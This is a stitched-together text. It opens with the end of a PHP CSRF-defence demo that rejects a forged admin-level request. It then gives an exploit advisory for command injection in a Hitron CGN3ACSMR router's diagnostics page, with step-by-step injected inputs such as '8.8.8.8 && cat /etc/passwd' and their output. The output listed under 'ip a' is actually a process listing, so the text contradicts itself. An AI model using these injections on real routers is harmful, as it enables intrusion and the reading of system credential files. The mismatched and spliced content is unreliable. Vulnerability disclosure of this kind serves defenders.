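    // Second line of defence: only an administrator may assign admin level.
    $level = (int) ($post['level'] ?? LEVEL_BASIC);
    if ($level === LEVEL_ADMIN && $actingUserLevel !== LEVEL_ADMIN) {
        return 'rejected: only administrators may grant admin level';
    }
    // saveUser($post) would persist the remaining fields here (placeholder).
    return 'saved';
}

// Constructed run: the forged request (no token) versus the legitimate form,
// both arriving in an administrator's session.
$token = csrfToken();                   // what the real edit form would embed
$forged = ['user_name' => 'hyp3rlinx', 'name' => 'hyp3rlinx', 'level' => '10'];
$legitimate = $forged + ['csrf_token' => $token];
echo handleUserSave('POST', $forged, LEVEL_ADMIN), PHP_EOL;
echo handleUserSave('POST', $legitimate, LEVEL_ADMIN), PHP_EOL;
```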
            
# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution 
# Author: Dolev Farhi (dolevf at protonmail.ch)
# Date: 29-10-2015
# Vendor homepage: http://www.hitrontech.com/en/index.php
# Software version: 4.5.8.16
# Hardware version: 1A

# Details:
Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI).
This interface is vulnerable to command injection: commands appended after the IP address with && are executed.

# Steps to reproduce:
1. Navigate to the dashboard.
2. Navigate to the admin tab.
3. Type an IP address in the Destination form.
4. Append any command after the IP address.

Example one: 
8.8.8.8 && cat /etc/passwd

Result

root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
rogcesadmin:filtered/:100:100::/:/usr/sbin/cli
=============Complete==============



Example two:
8.8.8.8 && ip a 
PID USER VSZ STAT COMMAND
1 root 1268 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW [kworker/u:0]
6 root 0 SW< [khelper]
7 root 0 SW [irq/74-hw_mutex]
8 root 0 SW [sync_supers]
9 root 0 SW [bdi-default]
10 root 0 SW< [kblockd]
11 root 0 SW< [gPunitWorkqueue]
12 root 0 SW [irq/79-punit_in]
13 root 0 SW [kswapd0]
14 root 0 SW< [crypto]